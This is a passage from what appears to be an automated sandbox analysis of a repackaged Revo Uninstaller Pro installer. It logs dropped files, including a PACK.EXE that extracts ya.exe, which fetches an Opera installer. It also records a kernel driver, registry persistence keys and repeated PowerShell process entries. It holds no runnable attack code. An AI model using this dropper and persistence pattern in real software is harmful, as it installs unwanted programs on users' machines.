      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_048C5EB2 push esp; ret 17_2_048C5EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_048C6820 push eax; ret 17_2_048C6833
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_048C3A98 push ebx; retf 17_2_048C3ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_05177711 push eax; ret 21_2_05177723
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_051742A8 push ebx; ret 21_2_051742DA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_051722FD pushad ; ret 21_2_05172301
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_05175EB0 push esp; ret 21_2_05175EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_05173A98 push ebx; retf 21_2_05173ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_08D4128A push eax; ret 21_2_08D412A3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04675EB0 push esp; ret 23_2_04675EC3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_04673AB8 push ebx; retf 23_2_04673ADA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 23_2_08272F23 push eax; ret 23_2_08272F33

      Persistence and Installation Behavior

      Source: c:\program files\vs revo group\revo uninstaller pro\ruext.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{2c5515dc-2a7e-4bfd-b813-cacc2b685eb7}\inprocserver32
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | File created: C:\Users\user\Downloads\OperaSetup.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_115.0.5322.77_Autoupdate_x64[1].exe
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dll
      Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dll
      Source: C:\Users\user\Downloads\OperaSetup.exe | File created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091154091\opera_package
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | File created: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tsjtmfdm[1].pkg
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\PACK.EXE
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OperaSetup[1].exe
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
      Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\System32\drivers\SETB88F.tmp
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | File created: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
      Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\DRIVERS\revoflt.sys (copy)
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115408145.log
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115410771.log
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt

      Boot Survival

      Source: C:\Windows\System32\rundll32.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\AllProgs\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\VS Revo Group\Revo Uninstaller Pro\Uninstaller\Traced\RegExclude HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
      Source: C:\Windows\System32\rundll32.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Revoflt\Instances

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\runonce.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\grpconv.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXE; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
